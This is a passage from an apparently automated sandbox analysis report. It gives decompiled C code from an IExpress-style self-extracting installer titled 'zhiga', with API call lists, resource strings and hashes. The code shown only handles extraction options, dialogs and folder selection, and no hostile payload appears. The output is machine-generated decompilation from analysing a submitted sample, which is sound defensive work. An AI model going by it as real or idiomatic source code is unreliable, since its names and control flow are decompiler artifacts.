                                                                        							_push(0xa391e4);
                                                                        							_t58 = 0x4cb;
                                                                        							goto L25;
                                                                        						}
                                                                        						__eflags =  *0xa391e4 - 0x5c;
                                                                        						if( *0xa391e4 != 0x5c) {
                                                                        							goto L32;
                                                                        						}
                                                                        						__eflags = _t24 - 0x5c;
                                                                        						if(_t24 != 0x5c) {
                                                                        							goto L32;
                                                                        						}
                                                                        						goto L21;
                                                                        					}
                                                                        					_t34 = _t20 - 1;
                                                                        					__eflags = _t34;
                                                                        					if(_t34 == 0) {
                                                                        						EndDialog(_t64, 0);
                                                                        						 *0xa39124 = 0x800704c7;
                                                                        						goto L39;
                                                                        					}
                                                                        					__eflags = _t34 != 0x834;
                                                                        					if(_t34 != 0x834) {
                                                                        						goto L36;
                                                                        					}
                                                                        					_t37 = LoadStringA( *0xa39a3c, 0x3e8, 0xa38598, 0x200);
                                                                        					__eflags = _t37;
                                                                        					if(_t37 != 0) {
                                                                        						_t38 = E00A34224(_t64, _t46, _t46);
                                                                        						__eflags = _t38;
                                                                        						if(_t38 == 0) {
                                                                        							goto L36;
                                                                        						}
                                                                        						_t39 = SetDlgItemTextA(_t64, 0x835, 0xa387a0);
                                                                        						__eflags = _t39;
                                                                        						if(_t39 != 0) {
                                                                        							goto L36;
                                                                        						}
                                                                        						_t63 = 0x4c0;
                                                                        						L9:
                                                                        						E00A344B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                        						_push(0);
                                                                        						goto L38;
                                                                        					}
                                                                        					_t63 = 0x4b1;
                                                                        					goto L9;
                                                                        				}
                                                                        				return 0;
                                                                        			}


                                                                        APIs
                                                                        • LoadStringA.USER32(000003E8,00A38598,00000200), ref: 00A33271
                                                                        • GetDesktopWindow.USER32 ref: 00A333E2
                                                                        • SetWindowTextA.USER32(?,zhiga), ref: 00A333F7
                                                                        • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00A33410
                                                                        • GetDlgItem.USER32(?,00000836), ref: 00A33426
                                                                        • EnableWindow.USER32(00000000), ref: 00A3342D
                                                                        • EndDialog.USER32(?,00000000), ref: 00A3343F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$zhiga
                                                                        • API String ID: 2418873061-456855365
                                                                        • Opcode ID: 15a21818131798d4c224b325f2fc13b250d96ed482788673ef5e7dffdff34523
                                                                        • Instruction ID: 7b0eeb309b1a9858b187971389addd4f1380f2c486a9a1d24cddfb5094dd2efb
                                                                        • Opcode Fuzzy Hash: 15a21818131798d4c224b325f2fc13b250d96ed482788673ef5e7dffdff34523
                                                                        • Instruction Fuzzy Hash: ED516D3234835077EF219BB55C4DFBB695DDB56B52F108228F286EA1D0CEA4CE03A261
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00A32CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t13;
                                                                        				void* _t20;
                                                                        				void* _t23;
                                                                        				void* _t27;
                                                                        				struct HRSRC__* _t31;
                                                                        				intOrPtr _t33;
                                                                        				void* _t43;
                                                                        				void* _t48;
                                                                        				signed int _t65;
                                                                        				struct HINSTANCE__* _t66;
                                                                        				signed int _t67;
                                                                        
                                                                        				_t13 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t13 ^ _t67;
                                                                        				_t65 = 0;
                                                                        				_t66 = __ecx;
                                                                        				_t48 = __edx;
                                                                        				 *0xa39a3c = __ecx;
                                                                        				memset(0xa39140, 0, 0x8fc);
                                                                        				memset(0xa38a20, 0, 0x32c);
                                                                        				memset(0xa388c0, 0, 0x104);
                                                                        				 *0xa393ec = 1;
                                                                        				_t20 = E00A3468F("TITLE", 0xa39154, 0x7f);
                                                                        				if(_t20 == 0 || _t20 > 0x80) {
                                                                        					_t64 = 0x4b1;
                                                                        					goto L32;
                                                                        				} else {
                                                                        					_t27 = CreateEventA(0, 1, 1, 0);
                                                                        					 *0xa3858c = _t27;
                                                                        					SetEvent(_t27);
                                                                        					_t64 = 0xa39a34;
                                                                        					if(E00A3468F("EXTRACTOPT", 0xa39a34, 4) != 0) {
                                                                        						if(( *0xa39a34 & 0x000000c0) == 0) {
                                                                        							L12:
                                                                        							 *0xa39120 =  *0xa39120 & _t65;
                                                                        							if(E00A35C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                        								if( *0xa38a3a == 0) {
                                                                        									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                        									if(_t31 != 0) {
                                                                        										_t65 = LoadResource(_t66, _t31);
                                                                        									}
                                                                        									if( *0xa38184 != 0) {
                                                                        										__imp__#17();
                                                                        									}
                                                                        									if( *0xa38a24 == 0) {
                                                                        										_t57 = _t65;
                                                                        										if(E00A336EE(_t65) == 0) {
                                                                        											goto L33;
                                                                        										} else {
                                                                        											_t33 =  *0xa39a40; // 0x3
                                                                        											_t48 = 1;
                                                                        											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                        												if(( *0xa39a34 & 0x00000100) == 0 || ( *0xa38a38 & 0x00000001) != 0 || E00A318A3(_t64, _t66) != 0) {
                                                                        													goto L30;
                                                                        												} else {
                                                                        													_t64 = 0x7d6;
                                                                        													if(E00A36517(_t57, 0x7d6, _t34, E00A319E0, 0x547, 0x83e) != 0x83d) {
                                                                        														goto L33;
                                                                        													} else {
                                                                        														goto L30;
                                                                        													}
                                                                        												}
                                                                        											} else {
                                                                        												L30:
                                                                        												_t23 = _t48;
                                                                        											}
                                                                        										}
                                                                        									} else {
                                                                        										_t23 = 1;
                                                                        									}
                                                                        								} else {
                                                                        									E00A32390(0xa38a3a);
                                                                        									goto L33;
                                                                        								}
                                                                        							} else {
                                                                        								_t64 = 0x520;
                                                                        								L32:
                                                                        								E00A344B9(0, _t64, 0, 0, 0x10, 0);
                                                                        								goto L33;
                                                                        							}
                                                                        						} else {
                                                                        							_t64 =  &_v268;
                                                                        							if(E00A3468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                        								goto L3;
                                                                        							} else {
                                                                        								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                        								 *0xa38588 = _t43;
                                                                        								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                        									goto L12;
                                                                        								} else {
                                                                        									if(( *0xa39a34 & 0x00000080) == 0) {
                                                                        										_t64 = 0x524;
                                                                        										if(E00A344B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                        											goto L12;
                                                                        										} else {
                                                                        											goto L11;
                                                                        										}
                                                                        									} else {
                                                                        										_t64 = 0x54b;
                                                                        										E00A344B9(0, 0x54b, "zhiga", 0, 0x10, 0);
                                                                        										L11:
                                                                        										CloseHandle( *0xa38588);
                                                                        										 *0xa39124 = 0x800700b7;
                                                                        										goto L33;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						L3:
                                                                        						_t64 = 0x4b1;
                                                                        						E00A344B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        						 *0xa39124 = 0x80070714;
                                                                        						L33:
                                                                        						_t23 = 0;
                                                                        					}
                                                                        				}
                                                                        				return E00A36CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                        			}

                                                                        0x00000000
                                                                        0x00a32e48
                                                                        0x00a32e30
                                                                        0x00a32e30
                                                                        0x00a32ef8
                                                                        0x00a32f01
                                                                        0x00000000
                                                                        0x00a32f01
                                                                        0x00a32d8a
                                                                        0x00a32d8f
                                                                        0x00a32da1
                                                                        0x00000000
                                                                        0x00a32da3
                                                                        0x00a32dae
                                                                        0x00a32db4
                                                                        0x00a32dbb
                                                                        0x00000000
                                                                        0x00a32dca
                                                                        0x00a32dd3
                                                                        0x00a32df5
                                                                        0x00a32e02
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a32dd5
                                                                        0x00a32dde
                                                                        0x00a32de3
                                                                        0x00a32e04
                                                                        0x00a32e0a
                                                                        0x00a32e10
                                                                        0x00000000
                                                                        0x00a32e10
                                                                        0x00a32dd3
                                                                        0x00a32dbb
                                                                        0x00a32da1
                                                                        0x00a32d5b
                                                                        0x00a32d5b
                                                                        0x00a32d5d
                                                                        0x00a32d69
                                                                        0x00a32d6e
                                                                        0x00a32f06
                                                                        0x00a32f06
                                                                        0x00a32f06
                                                                        0x00a32d59
                                                                        0x00a32f18

                                                                        APIs
                                                                        • memset.MSVCRT ref: 00A32CD9
                                                                        • memset.MSVCRT ref: 00A32CE9
                                                                        • memset.MSVCRT ref: 00A32CF9
                                                                          • Part of subcall function 00A3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346A0
                                                                          • Part of subcall function 00A3468F: SizeofResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346A9
                                                                          • Part of subcall function 00A3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346C3
                                                                          • Part of subcall function 00A3468F: LoadResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346CC
                                                                          • Part of subcall function 00A3468F: LockResource.KERNEL32(00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346D3
                                                                          • Part of subcall function 00A3468F: memcpy_s.MSVCRT ref: 00A346E5
                                                                          • Part of subcall function 00A3468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346EF
                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A32D34
                                                                        • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00A32D40
                                                                        • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A32DAE
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00A32DBD
                                                                        • CloseHandle.KERNEL32(zhiga,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A32E0A
                                                                          • Part of subcall function 00A344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A34518
                                                                          • Part of subcall function 00A344B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00A34554
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                        • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$zhiga
                                                                        • API String ID: 1002816675-3407794480
                                                                        • Opcode ID: 29742116154dc5e59e03c0643a1d3f4b20cf490256fb4f34633d12f413faed23
                                                                        • Instruction ID: 822f2e985f7c0332b43d90326e9aa08e8e03b05986074be7fc82e32284ca1fc8
                                                                        • Opcode Fuzzy Hash: 29742116154dc5e59e03c0643a1d3f4b20cf490256fb4f34633d12f413faed23
                                                                        • Instruction Fuzzy Hash: 2B51F570740301ABE764EBB49D4BBBB3AA8EB55740F204139F981D61D1DBB88C42DB21
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 81%
                                                                        			E00A334F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                        				void* _t9;
                                                                        				void* _t12;
                                                                        				void* _t13;
                                                                        				void* _t17;
                                                                        				void* _t23;
                                                                        				void* _t25;
                                                                        				struct HWND__* _t35;
                                                                        				struct HWND__* _t38;
                                                                        				void* _t39;
                                                                        
                                                                        				_t9 = _a8 - 0x10;
                                                                        				if(_t9 == 0) {
                                                                        					__eflags = 1;
                                                                        					L19:
                                                                        					_push(0);
                                                                        					 *0xa391d8 = 1;
                                                                        					L20:
                                                                        					_push(_a4);
                                                                        					L21:
                                                                        					EndDialog();
                                                                        					L22:
                                                                        					return 1;
                                                                        				}
                                                                        				_push(1);
                                                                        				_pop(1);
                                                                        				_t12 = _t9 - 0xf2;
                                                                        				if(_t12 == 0) {
                                                                        					__eflags = _a12 - 0x1b;
                                                                        					if(_a12 != 0x1b) {
                                                                        						goto L22;
                                                                        					}
                                                                        					goto L19;
                                                                        				}
                                                                        				_t13 = _t12 - 0xe;
                                                                        				if(_t13 == 0) {
                                                                        					_t35 = _a4;
                                                                        					 *0xa38584 = _t35;
                                                                        					E00A343D0(_t35, GetDesktopWindow());
                                                                        					__eflags =  *0xa38184; // 0x1
                                                                        					if(__eflags != 0) {
                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                        					}
                                                                        					SetWindowTextA(_t35, "zhiga");
                                                                        					_t17 = CreateThread(0, 0, E00A34FE0, 0, 0, 0xa38798);
                                                                        					 *0xa3879c = _t17;
                                                                        					__eflags = _t17;
                                                                        					if(_t17 != 0) {
                                                                        						goto L22;
                                                                        					} else {
                                                                        						E00A344B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                        						_push(0);
                                                                        						_push(_t35);
                                                                        						goto L21;
                                                                        					}
                                                                        				}
                                                                        				_t23 = _t13 - 1;
                                                                        				if(_t23 == 0) {
                                                                        					__eflags = _a12 - 2;
                                                                        					if(_a12 != 2) {
                                                                        						goto L22;
                                                                        					}
                                                                        					ResetEvent( *0xa3858c);
                                                                        					_t38 =  *0xa38584; // 0x0
                                                                        					_t25 = E00A344B9(_t38, 0x4b2, 0xa31140, 0, 0x20, 4);
                                                                        					__eflags = _t25 - 6;
                                                                        					if(_t25 == 6) {
                                                                        						L11:
                                                                        						 *0xa391d8 = 1;
                                                                        						SetEvent( *0xa3858c);
                                                                        						_t39 =  *0xa3879c; // 0x0
                                                                        						E00A33680(_t39);
                                                                        						_push(0);
                                                                        						goto L20;
                                                                        					}
                                                                        					__eflags = _t25 - 1;
                                                                        					if(_t25 == 1) {
                                                                        						goto L11;
                                                                        					}
                                                                        					SetEvent( *0xa3858c);
                                                                        					goto L22;
                                                                        				}
                                                                        				if(_t23 == 0xe90) {
                                                                        					TerminateThread( *0xa3879c, 0);
                                                                        					EndDialog(_a4, _a12);
                                                                        					return 1;
                                                                        				}
                                                                        				return 0;
                                                                        			}













                                                                        APIs
                                                                        • TerminateThread.KERNEL32(00000000), ref: 00A33535
                                                                        • EndDialog.USER32(?,?), ref: 00A33541
                                                                        • ResetEvent.KERNEL32 ref: 00A3355F
                                                                        • SetEvent.KERNEL32(00A31140,00000000,00000020,00000004), ref: 00A33590
                                                                        • GetDesktopWindow.USER32 ref: 00A335C7
                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00A335F1
                                                                        • SendMessageA.USER32(00000000), ref: 00A335F8
                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00A33610
                                                                        • SendMessageA.USER32(00000000), ref: 00A33617
                                                                        • SetWindowTextA.USER32(?,zhiga), ref: 00A33623
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00004FE0,00000000,00000000,00A38798), ref: 00A33637
                                                                        • EndDialog.USER32(?,00000000), ref: 00A33671
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                        • String ID: zhiga
                                                                        • API String ID: 2406144884-3705506974
                                                                        • Opcode ID: 4ec6e711bf5911fc181ea9d13c881310cd4a571a3f13adcd76f388acf72378f6
                                                                        • Instruction ID: 26666f27d17de9f35a7f140fb59618510fb6820fa1a457cf7cb2e3aa7fd2a8e0
                                                                        • Opcode Fuzzy Hash: 4ec6e711bf5911fc181ea9d13c881310cd4a571a3f13adcd76f388acf72378f6
                                                                        • Instruction Fuzzy Hash: EB31D032248310BFDB20DFA5EC4EE7B3A79E799B01F104629F642952B0CB758A02DB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 50%
                                                                        			E00A34224(char __ecx) {
                                                                        				char* _v8;
                                                                        				_Unknown_base(*)()* _v12;
                                                                        				_Unknown_base(*)()* _v16;
                                                                        				_Unknown_base(*)()* _v20;
                                                                        				char* _v28;
                                                                        				intOrPtr _v32;
                                                                        				intOrPtr _v36;
                                                                        				intOrPtr _v40;
                                                                        				char _v44;
                                                                        				char _v48;
                                                                        				char _v52;
                                                                        				_Unknown_base(*)()* _t26;
                                                                        				_Unknown_base(*)()* _t28;
                                                                        				_Unknown_base(*)()* _t29;
                                                                        				_Unknown_base(*)()* _t32;
                                                                        				char _t42;
                                                                        				char* _t44;
                                                                        				char* _t61;
                                                                        				void* _t63;
                                                                        				char* _t65;
                                                                        				struct HINSTANCE__* _t66;
                                                                        				char _t67;
                                                                        				void* _t71;
                                                                        				char _t76;
                                                                        				intOrPtr _t85;
                                                                        
                                                                        				_t67 = __ecx;
                                                                        				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                        				if(_t66 == 0) {
                                                                        					_t63 = 0x4c2;
                                                                        					L22:
                                                                        					E00A344B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                        					return 0;
                                                                        				}
                                                                        				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                        				_v12 = _t26;
                                                                        				if(_t26 == 0) {
                                                                        					L20:
                                                                        					FreeLibrary(_t66);
                                                                        					_t63 = 0x4c1;
                                                                        					goto L22;
                                                                        				}
                                                                        				_t28 = GetProcAddress(_t66, 0xc3);
                                                                        				_v20 = _t28;
                                                                        				if(_t28 == 0) {
                                                                        					goto L20;
                                                                        				}
                                                                        				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                        				_v16 = _t29;
                                                                        				if(_t29 == 0) {
                                                                        					goto L20;
                                                                        				}
                                                                        				_t76 =  *0xa388c0; // 0x0
                                                                        				if(_t76 != 0) {
                                                                        					L10:
                                                                        					 *0xa387a0 = 0;
                                                                        					_v52 = _t67;
                                                                        					_v48 = 0;
                                                                        					_v44 = 0;
                                                                        					_v40 = 0xa38598;
                                                                        					_v36 = 1;
                                                                        					_v32 = E00A34200;
                                                                        					_v28 = 0xa388c0;
                                                                        					 *0xa3a288( &_v52);
                                                                        					_t32 =  *_v12();
                                                                        					if(_t71 != _t71) {
                                                                        						asm("int 0x29");
                                                                        					}
                                                                        					_v12 = _t32;
                                                                        					if(_t32 != 0) {
                                                                        						 *0xa3a288(_t32, 0xa388c0);
                                                                        						 *_v16();
                                                                        						if(_t71 != _t71) {
                                                                        							asm("int 0x29");
                                                                        						}
                                                                        						if( *0xa388c0 != 0) {
                                                                        							E00A31680(0xa387a0, 0x104, 0xa388c0);
                                                                        						}
                                                                        						 *0xa3a288(_v12);
                                                                        						 *_v20();
                                                                        						if(_t71 != _t71) {
                                                                        							asm("int 0x29");
                                                                        						}
                                                                        					}
                                                                        					FreeLibrary(_t66);
                                                                        					_t85 =  *0xa387a0; // 0x0
                                                                        					return 0 | _t85 != 0x00000000;
                                                                        				} else {
                                                                        					GetTempPathA(0x104, 0xa388c0);
                                                                        					_t61 = 0xa388c0;
                                                                        					_t4 =  &(_t61[1]); // 0xa388c1
                                                                        					_t65 = _t4;
                                                                        					do {
                                                                        						_t42 =  *_t61;
                                                                        						_t61 =  &(_t61[1]);
                                                                        					} while (_t42 != 0);
                                                                        					_t5 = _t61 - _t65 + 0xa388c0; // 0x1471181
                                                                        					_t44 = CharPrevA(0xa388c0, _t5);
                                                                        					_v8 = _t44;
                                                                        					if( *_t44 == 0x5c &&  *(CharPrevA(0xa388c0, _t44)) != 0x3a) {
                                                                        						 *_v8 = 0;
                                                                        					}
                                                                        					goto L10;
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00A34236
                                                                        • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00A3424C
                                                                        • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00A34263
                                                                        • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00A3427A
                                                                        • GetTempPathA.KERNEL32(00000104,00A388C0,?,00000001), ref: 00A3429F
                                                                        • CharPrevA.USER32(00A388C0,01471181,?,00000001), ref: 00A342C2
                                                                        • CharPrevA.USER32(00A388C0,00000000,?,00000001), ref: 00A342D6
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A34391
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A343A5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                        • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                        • API String ID: 1865808269-1731843650
                                                                        • Opcode ID: 8c2d2f8af65aa7c6d34fcd6e30088d41475b1c9566ece2a561d9610ce8408339
                                                                        • Instruction ID: 5558ea43b3da048cc36b90c7ba2baa2a7f49096b0f769e2d77fa066b5cce7bbf
                                                                        • Opcode Fuzzy Hash: 8c2d2f8af65aa7c6d34fcd6e30088d41475b1c9566ece2a561d9610ce8408339
                                                                        • Instruction Fuzzy Hash: ED410674A00314AFD711EFF4DC88AAEBBB8EB59384F040569F981A7351CB789C02C761
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00A344B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                        				signed int _v8;
                                                                        				char _v64;
                                                                        				char _v576;
                                                                        				void* _v580;
                                                                        				struct HWND__* _v584;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t34;
                                                                        				void* _t37;
                                                                        				signed int _t39;
                                                                        				intOrPtr _t43;
                                                                        				signed int _t44;
                                                                        				signed int _t49;
                                                                        				signed int _t52;
                                                                        				void* _t54;
                                                                        				intOrPtr _t55;
                                                                        				intOrPtr _t58;
                                                                        				intOrPtr _t59;
                                                                        				int _t64;
                                                                        				void* _t66;
                                                                        				intOrPtr* _t67;
                                                                        				signed int _t69;
                                                                        				intOrPtr* _t73;
                                                                        				intOrPtr* _t76;
                                                                        				intOrPtr* _t77;
                                                                        				void* _t80;
                                                                        				void* _t81;
                                                                        				void* _t82;
                                                                        				intOrPtr* _t84;
                                                                        				void* _t85;
                                                                        				signed int _t89;
                                                                        
                                                                        				_t75 = __edx;
                                                                        				_t34 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t34 ^ _t89;
                                                                        				_v584 = __ecx;
                                                                        				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                        				_t67 = _a4;
                                                                        				_t69 = 0xd;
                                                                        				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                        				_t80 = _t83 + _t69 + _t69;
                                                                        				_v580 = _t37;
                                                                        				asm("movsb");
                                                                        				if(( *0xa38a38 & 0x00000001) != 0) {
                                                                        					_t39 = 1;
                                                                        				} else {
                                                                        					_v576 = 0;
                                                                        					LoadStringA( *0xa39a3c, _t75,  &_v576, 0x200);
                                                                        					if(_v576 != 0) {
                                                                        						_t73 =  &_v576;
                                                                        						_t16 = _t73 + 1; // 0x1
                                                                        						_t75 = _t16;
                                                                        						do {
                                                                        							_t43 =  *_t73;
                                                                        							_t73 = _t73 + 1;
                                                                        						} while (_t43 != 0);
                                                                        						_t84 = _v580;
                                                                        						_t74 = _t73 - _t75;
                                                                        						if(_t84 == 0) {
                                                                        							if(_t67 == 0) {
                                                                        								_t27 = _t74 + 1; // 0x2
                                                                        								_t83 = _t27;
                                                                        								_t44 = LocalAlloc(0x40, _t83);
                                                                        								_t80 = _t44;
                                                                        								if(_t80 == 0) {
                                                                        									goto L6;
                                                                        								} else {
                                                                        									_t75 = _t83;
                                                                        									_t74 = _t80;
                                                                        									E00A31680(_t80, _t83,  &_v576);
                                                                        									goto L23;
                                                                        								}
                                                                        							} else {
                                                                        								_t76 = _t67;
                                                                        								_t24 = _t76 + 1; // 0x1
                                                                        								_t85 = _t24;
                                                                        								do {
                                                                        									_t55 =  *_t76;
                                                                        									_t76 = _t76 + 1;
                                                                        								} while (_t55 != 0);
                                                                        								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                        								_t83 = _t25 + _t74;
                                                                        								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                        								_t80 = _t44;
                                                                        								if(_t80 == 0) {
                                                                        									goto L6;
                                                                        								} else {
                                                                        									E00A3171E(_t80, _t83,  &_v576, _t67);
                                                                        									goto L23;
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							_t77 = _t67;
                                                                        							_t18 = _t77 + 1; // 0x1
                                                                        							_t81 = _t18;
                                                                        							do {
                                                                        								_t58 =  *_t77;
                                                                        								_t77 = _t77 + 1;
                                                                        							} while (_t58 != 0);
                                                                        							_t75 = _t77 - _t81;
                                                                        							_t82 = _t84 + 1;
                                                                        							do {
                                                                        								_t59 =  *_t84;
                                                                        								_t84 = _t84 + 1;
                                                                        							} while (_t59 != 0);
                                                                        							_t21 = _t74 + 0x64; // 0x65
                                                                        							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                        							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                        							_t80 = _t44;
                                                                        							if(_t80 == 0) {
                                                                        								goto L6;
                                                                        							} else {
                                                                        								_push(_v580);
                                                                        								E00A3171E(_t80, _t83,  &_v576, _t67);
                                                                        								L23:
                                                                        								MessageBeep(_a12);
                                                                        								if(E00A3681F(_t67) == 0) {
                                                                        									L25:
                                                                        									_t49 = 0x10000;
                                                                        								} else {
                                                                        									_t54 = E00A367C9(_t74, _t74);
                                                                        									_t49 = 0x190000;
                                                                        									if(_t54 == 0) {
                                                                        										goto L25;
                                                                        									}
                                                                        								}
                                                                        								_t52 = MessageBoxA(_v584, _t80, "zhiga", _t49 | _a12 | _a16);
                                                                        								_t83 = _t52;
                                                                        								LocalFree(_t80);
                                                                        								_t39 = _t52;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						if(E00A3681F(_t67) == 0) {
                                                                        							L4:
                                                                        							_t64 = 0x10010;
                                                                        						} else {
                                                                        							_t66 = E00A367C9(0, 0);
                                                                        							_t64 = 0x190010;
                                                                        							if(_t66 == 0) {
                                                                        								goto L4;
                                                                        							}
                                                                        						}
                                                                        						_t44 = MessageBoxA(_v584,  &_v64, "zhiga", _t64);
                                                                        						L6:
                                                                        						_t39 = _t44 | 0xffffffff;
                                                                        					}
                                                                        				}
                                                                        				return E00A36CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                        			}




































                                                                        APIs
